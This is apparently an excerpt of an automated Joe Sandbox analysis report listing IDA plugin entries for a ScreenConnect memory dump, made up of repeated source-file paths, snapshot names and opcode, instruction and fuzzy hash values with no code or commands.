                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: eabccc3149cce088a49bd3b3169fe5b148f4dec20f052fecf4a5299c559dda06
                                                                                                                                                                                                                                                        • Instruction ID: a666746e1cfe735f1b4ee450303f946f2d4c3d20dd6ea2ce437dde063344c0d5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eabccc3149cce088a49bd3b3169fe5b148f4dec20f052fecf4a5299c559dda06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3412831D0CB594FDB15AFA8984A5F9BBE0EF56720F04027FE049C3292DE68B856C791

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: c88ac7b3f7a282033bbcaf193bb25f33ed0859d909af0728056690a544f5e09d
                                                                                                                                                                                                                                                        • Instruction ID: 911052e1ff4714a724eda2921776fe16c4e5a87f01ced390d12665140e339590
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c88ac7b3f7a282033bbcaf193bb25f33ed0859d909af0728056690a544f5e09d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C817430A18E168BEB5ABF6890517FDF292EF95B15F904539D04EC3386DF28B84182A0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1df337d57faf402763df8857bbd2aa40d688a9d7c5de3c14d87c07d9b0fb84b0
                                                                                                                                                                                                                                                        • Instruction ID: eb5d44eff03025da08fe0da9a172d825bdecb140e71c27ca292559c9e8f69669
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1df337d57faf402763df8857bbd2aa40d688a9d7c5de3c14d87c07d9b0fb84b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC022470A0CA4A4FE79AEB6C94557F8B7D1FF99311F4441B9D44EC7292DE28F84283A0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 890ed3b944f38afa60b34d692ad09bd0579ccbacfbaf94d44841a8f98d5b9fbd
                                                                                                                                                                                                                                                        • Instruction ID: 80a72dc3bbf21272542226779da9e9031f90c6f56cc2dd089954149e635730b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 890ed3b944f38afa60b34d692ad09bd0579ccbacfbaf94d44841a8f98d5b9fbd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75B10370A1CE4A4FDB5AEB28A4592BCB7E1FF55621F8401BED40EC72D3DE24B8458781
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 902133d94628fbc75c9a9a4d85ddfd6f51f84cd7cc119661f270a422e210f174
                                                                                                                                                                                                                                                        • Instruction ID: b9af999aac8596495d59d0042aeecccc951964cc5940951b4fa79b88dd009847
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 902133d94628fbc75c9a9a4d85ddfd6f51f84cd7cc119661f270a422e210f174
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AC1243190CA4A4FDB59EF2890529B9F7A0FF55764B80026EC44EC7683DF24F81A87D1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e47c54b2b62a14ffd987c69c1f5728125caac0fcb6c0d529e3497948e110ed7
                                                                                                                                                                                                                                                        • Instruction ID: b547a809fe7c06971a68eebc43bc2192046388f8e1b059cffabd8af32a878700
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e47c54b2b62a14ffd987c69c1f5728125caac0fcb6c0d529e3497948e110ed7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDC15F74708A4A8FDB98EF1CD494769B3E2FF58314B5446A9D45ACB386CB31EC52CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d938308ce52aa9ac97d748c47643336ef43d5fe6727824dc6187384097821da9
                                                                                                                                                                                                                                                        • Instruction ID: cf57b505612db7f44a7229a3c41ac4321cea097a54976032a52f09ca33420a21
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d938308ce52aa9ac97d748c47643336ef43d5fe6727824dc6187384097821da9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BA1E87071CE868FDB49AB2CA455678B7D2FF98720B9442BED44DC72C7CE24B8068785
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d27ac22c45852d1744c498c4b30b71bf0b8154b58c774c269e122c110786c175
                                                                                                                                                                                                                                                        • Instruction ID: 621cc93fde115f88d7629f5b3dbd3900f173befef5a4c4b055a94359c977bae2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d27ac22c45852d1744c498c4b30b71bf0b8154b58c774c269e122c110786c175
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BA1DF31A28A454FD759EF2C9455AA9B7D2FF98710F4541BEE00EC73D3CE24AC068791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0974553ea744ad624fbd70a5d4c3a6b66c2d360d793e7e0d110cde1d2f06a230
                                                                                                                                                                                                                                                        • Instruction ID: 2423c23d652a3188915698199480ff38128bb80fafee930dc2ea248f6a282bbe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0974553ea744ad624fbd70a5d4c3a6b66c2d360d793e7e0d110cde1d2f06a230
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DB1DE70A1861A8BEB5DFB18D8657F9B6A1FF94311F90017CE44ED33C2CE2C69468B91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b505e8ef4cfad5ba83022abc52e7d952bc0adaeae05455076bdcd7e65e9fcfdb
                                                                                                                                                                                                                                                        • Instruction ID: e50c5adf13950213e2598d7c53ff32fbeb9e5db0b0a871cf405242da0c137415
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b505e8ef4cfad5ba83022abc52e7d952bc0adaeae05455076bdcd7e65e9fcfdb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8591EF30A1CA868FDB49EF2894556A9B7E1FF99310F5442BED04EC7293DE24F80687C1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0b8674e38bb71f917568e1efaf1ec8fb9fc1d0af691a28a56b549b8eb2e9da8d
                                                                                                                                                                                                                                                        • Instruction ID: 16628641913874f98b791a9432a1b631b1c0f836a6229ca7e5399149a3c1dcf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b8674e38bb71f917568e1efaf1ec8fb9fc1d0af691a28a56b549b8eb2e9da8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5181B131918A0A5BDF69EF14D4929B9F3A1FF64760B804229D44F87682DF24F91A8BD0
Memory Dump Source
• Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 805ecd061d0454c146776dcf66571a067acf16cac3fb44a9974df180f9be6082
                                                                                                                                                                                                                                                        • Instruction ID: 63aa6e664ac81378cbc779bce669eabc3cac123f5d59cb46435913697b18f79e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 805ecd061d0454c146776dcf66571a067acf16cac3fb44a9974df180f9be6082
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33818170618A4DCFCF89EF18C4A4AA9B7A1FF59314B5046A9D41EC7396CB35F852CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ac9fba3e1caef376ff821979aca84c9c6646cec68d5fd1318874783e44db84ae
                                                                                                                                                                                                                                                        • Instruction ID: 9b3971b5df9d20053687477940f4ee992dd8496bf06d00f071139ce9a0aa2bdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac9fba3e1caef376ff821979aca84c9c6646cec68d5fd1318874783e44db84ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1716270608A4D8FCF98DF18C494AA9B7B1FF99314B5446ADD41ECB396CB35E812CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d06c22165ce40fceaff51937e84c1c5c7465e0bed8dbd6a3fa60be558066d5e
                                                                                                                                                                                                                                                        • Instruction ID: c583d7f4676093c6b409025ed03f5b5cbcbf668a3c3353ddd71dfdb552bac7bc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d06c22165ce40fceaff51937e84c1c5c7465e0bed8dbd6a3fa60be558066d5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1516672A0CE4A8FD756AF6CA8501E9FBA1FF84724B44067AD05DC3252EF25B916C7C0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0efc23397f32aec0cd2f6a63486eb627e2c1710109d789e0719ad8791c1c80d7
                                                                                                                                                                                                                                                        • Instruction ID: 61cc74e8496d12803bd49315af8bf19c0df751d968fa0730a40ab2e6f62b8ced
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0efc23397f32aec0cd2f6a63486eb627e2c1710109d789e0719ad8791c1c80d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B61B370A18E8A4FEB86EF2894696A8F7A1FF59324F44017DD04ED7293DF25B801C785
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 49bbcf9d59a1af8e99e4b8de922265ad4617c67781de563e03ed72e171bb596f
                                                                                                                                                                                                                                                        • Instruction ID: 59b1319c8c7f0ed170e612ed127bfa0e4c7ff3956ec05aba608b055e73102596
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49bbcf9d59a1af8e99e4b8de922265ad4617c67781de563e03ed72e171bb596f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519F30618A5A8FDB99AF2C90517A9F392FFA8714F904279C40EC7286DF34F81687D1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c51210dc7722791b61ee61a25c3dff7688ff9ac7fb987360d1e9b020e51cdd60
                                                                                                                                                                                                                                                        • Instruction ID: e37064fef880093bf94a1d60b13a051c54da24a205819699f92914edd1759c8c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c51210dc7722791b61ee61a25c3dff7688ff9ac7fb987360d1e9b020e51cdd60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B518E70618A4A8FDB48EF2CD455AA9B3E2FF98315B50427DD40EC7296DE24E85287C1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bdc129f35bba9c4c4d39ba153cf8944a826b595b7e3e54078781e31e469184bd
                                                                                                                                                                                                                                                        • Instruction ID: 3bb2b0b19c25c2a31f4a3c962dd96356e395e59cec519b318f054a6667f4c9f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdc129f35bba9c4c4d39ba153cf8944a826b595b7e3e54078781e31e469184bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A651C47071CE558FDB48EB1CA4556A9F7D1FF98720B5446AED40EC7286CE20F80187C5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4d328a81a670d0ebcb1d61a1f43e90f6eaeb96ff37b7e41ad66ad6be093538d1
                                                                                                                                                                                                                                                        • Instruction ID: 37990562b640c48e769890fe14059e098172a03ddcd36d8b913e6d5149c67bb1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d328a81a670d0ebcb1d61a1f43e90f6eaeb96ff37b7e41ad66ad6be093538d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC513621A0DBC74FD756AB3D58652A8FBA0FF96610B4986FAC04CC71D3CA18B8098391
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3046daf05c06c1d90c99dee0dcfd2a6f26b90e9bf9c14c43daea7cf10e5d3cd3
                                                                                                                                                                                                                                                        • Instruction ID: 920514e7ab098c292eb144d57ef739082caba8fec94862f0e78b543c225b555a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3046daf05c06c1d90c99dee0dcfd2a6f26b90e9bf9c14c43daea7cf10e5d3cd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22510531A0C94A4FEB64FA2894596BCF6D1EF94B30FA401B9D16DC72D2CA18BD4543E1
Memory Dump Source
• Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69854c2150545e4727f423b40772c53c0556329e5c0de487bcbdce6350f05436
                                                                                                                                                                                                                                                        • Instruction ID: bb622192a94c205818ce81cc3bc17a2bb947793ab59d36d3a9dcad1430d95534
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69854c2150545e4727f423b40772c53c0556329e5c0de487bcbdce6350f05436
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41415C21A1DECA0FC745AB3C6428565BFE4FF96221B5442BFD44DC7293DE14BC058391
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 39fef2554f0c5f3374b09c367781b6120bd57fee64fb58820b86360bdc3f8ba0
                                                                                                                                                                                                                                                        • Instruction ID: b35662357ca7920492a762f18d45bc0b3f19772409f0675872ea7bb0e114aef6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39fef2554f0c5f3374b09c367781b6120bd57fee64fb58820b86360bdc3f8ba0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87518CB0609A498FCB89EF28C465B95B7A1FF58314B0445ACD49ECB697CB31F816CBC4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 419ef184fa17589b20aa3d1c3412195ef17206adf38e1988099a38bb8a8a2517
                                                                                                                                                                                                                                                        • Instruction ID: c79598b2955444ed69eb6adbd86278f85df2e781558732be708ee8d9a7e89b26
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 419ef184fa17589b20aa3d1c3412195ef17206adf38e1988099a38bb8a8a2517
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7741D731A08A1D8FDB54EF68A4986E9FBE1FF59315B4442AAD40DD7352CF31B846CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68a5541fab9269aca192f54c34c18ef8d2ce793b5a6b9b250000e94b1f1bb55e
                                                                                                                                                                                                                                                        • Instruction ID: 12fd9615a6c71ee374616a05a06cb36ac942d5862d23787129a3ca8da62ea44c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a5541fab9269aca192f54c34c18ef8d2ce793b5a6b9b250000e94b1f1bb55e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2519470618A498FCB89DF28D8A4AA977A1FF59314B54429DE46EC73D2CB31E812CB41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: de6c4c973c3c9187305e85c7f326210c635bf970a735232fcdd5253bc46a90ad
                                                                                                                                                                                                                                                        • Instruction ID: fa7cc0b26daf11c0922ba2b7d7ec9d04adacc8d332c3e8ea0d15d2a8b3dce6c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de6c4c973c3c9187305e85c7f326210c635bf970a735232fcdd5253bc46a90ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D441D670B08E0D8FDB94AF29A49CABCFBE1FF69711B44016AD559C7392DF24A801C791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 690d966a13e55519a44a44e8d9a8f7beb51d27ff4f33ee88d0db8e5e59651bb8
                                                                                                                                                                                                                                                        • Instruction ID: 576d85ca82a79ee2eee6061da9f0d0ffad8c1064788c2b0bee25deb119aeffb6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690d966a13e55519a44a44e8d9a8f7beb51d27ff4f33ee88d0db8e5e59651bb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1641B230A18E494FE785FB2C94567B9F7E2FF88710F44427AD04EC3692DE28B8428391
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
